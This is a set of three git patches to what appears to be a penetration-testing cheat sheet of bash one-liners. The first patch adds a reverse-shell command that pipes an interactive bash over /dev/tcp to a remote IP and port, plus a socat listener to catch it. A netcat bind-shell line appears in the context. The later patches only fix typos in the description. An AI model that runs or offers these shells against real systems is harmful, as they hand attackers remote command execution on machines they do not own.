From 2ed0048a28e79db3566bc138b85bedccd21af0c0 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 14:30:16 +0100 Subject: [PATCH 1/3] Bash reverse tcp example in scripting/bash onliner --- scripting/bash.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scripting/bash.md b/scripting/bash.md index abf1347..3a54e14 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -113,6 +113,20 @@ nc -e /bin/bash -lp *port* cat /proc/cpuinfo ``` +**Bash reverse shell** (@icleus) +Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +```bash +bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & +``` + +I find this best works with a socat listener due to the readline support. + +```bash +socat readline TCP-LISTEN:1234 +``` + + Credits ----------- Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) From c71945966fd8339363da60807ac2e34f6a8237b1 Mon Sep 17 00:00:00 2001 From: David Busby Date: Fri, 6 Jun 2014 16:27:11 +0100 Subject: [PATCH 2/3] typo correction --- scripting/bash.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 3a54e14..21b0e41 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -114,7 +114,8 @@ cat /proc/cpuinfo ``` **Bash reverse shell** (@icleus) -Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host. + +Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & From 726f60ce32113fdc074e91881d9e506b8a38763a Mon Sep 17 00:00:00 2001 From: David Busby Date: Sat, 7 Jun 2014 12:00:10 +0100 Subject: [PATCH 3/3] typo correction --- scripting/bash.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripting/bash.md b/scripting/bash.md index 21b0e41..d4276fb 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -115,7 +115,7 @@ cat /proc/cpuinfo **Bash reverse shell** (@icleus) -Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. +Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. ```bash bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &